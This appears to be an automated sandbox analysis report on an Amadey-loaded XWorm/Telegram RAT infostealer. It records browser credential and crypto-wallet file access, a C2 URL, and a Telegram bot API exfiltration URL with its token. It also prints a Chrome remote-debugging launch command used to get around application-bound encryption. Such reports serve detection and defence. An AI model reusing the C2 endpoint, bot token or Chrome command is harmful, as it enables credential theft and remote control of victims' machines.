Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12CD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_00007FF7E12CD010

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12E5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

7_2_00007FF7E12E5C00

Source: C:\Windows\System32\dxdiag.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR

Yara detected XWorm

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

Yara detected Telegram RAT

Source: Yara match	File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR

Yara detected XWorm

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	3 Obfuscated Files or Information	Security Account Manager	357 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	12 Process Injection	1 Install Root Certificate	NTDS	11101 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	12 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	481 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	481 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	47%	ReversingLabs	Win32.Packed.Themida

Source	Detection	Scanner	Label
http://ocsp.accv.esS	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php8	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9	100%	Avira URL Cloud	malware
https://peps.python.org/pep-0685/Pp	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php$	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
api.myip.com	172.67.75.163	true	false	high
thedotmediagroup.com	188.165.52.14	true	false	unknown
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	3.160.188.18	true	false	high
www.google.com	142.250.181.100	true	false	high
api.telegram.org	149.154.167.220	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js	false		high
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/astral-sh/ruff	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages	samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/issues	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wheel.readthedocs.io/en/stable/news.html	samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpnu	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
